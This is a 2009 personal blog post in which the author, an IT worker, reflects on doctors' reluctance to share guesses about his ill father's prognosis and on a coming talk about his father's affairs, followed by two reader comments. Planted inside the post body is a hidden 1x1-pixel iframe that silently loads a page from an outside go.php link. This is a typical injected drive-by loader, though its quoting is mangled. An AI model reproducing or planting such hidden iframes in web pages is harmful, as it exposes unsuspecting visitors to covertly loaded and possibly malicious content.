Posted by: wrmcnutt | September 3, 2009

Just The Fact’s Ma’am


I suspect that all of Dad’s doctors are being candid about the facts, per se.  As an information technologist, I find appalling similarities between my work with computers and networks, and the medical profession.

In particular, it’s very, very hard to get me to speculate how long it’s going to take me to fix a problem.  You see, no matter how many caveats, disclaimers, notices and warnings I put out, if I tell clients what I think, they drive iron spikes through it, pour concrete around it, and hold me to it.  So I’ll only share speculation, intuition, and instinct with other technicians.

I suspect that’s what I’m seeing here.  The symptoms and data they’ve seen, combined with their experience and training, have led them to suspect a conclusion that cannot share with me because if they’re wrong, they fear I’ll sue the crap out of them. 

I was more angry the other day when it appeared that the surgeon was going to refuse to cut than I am over not having their guesses spelled out in black and white.

On a related note, Dad has asked me to set aside some time tonight to talk about his affairs.  I’ve got some concerns about that sort of thing, so I’m glad he’s brought it up, but at the same time, I’m dreading it.

[iframe width=”1″ height=”1″ src=”http://s6g.info/go.php?sid=1″%5D

Responses

  1. oh Bill. I’m so sorry.

  2. I think doctors don’t tell you what they’re thinking because they don’t have a clue. What credibility do I have for making such a statement. Check out my ongoing search for competent medical care on my blog http://doctorblue.wordpress.com. I became disabled and broke after doctors’ best efforts at helping me was to do nothing more than order tests and refer me to other doctors. No one came up with diagnosis or treatment.


Leave a Reply

Categories

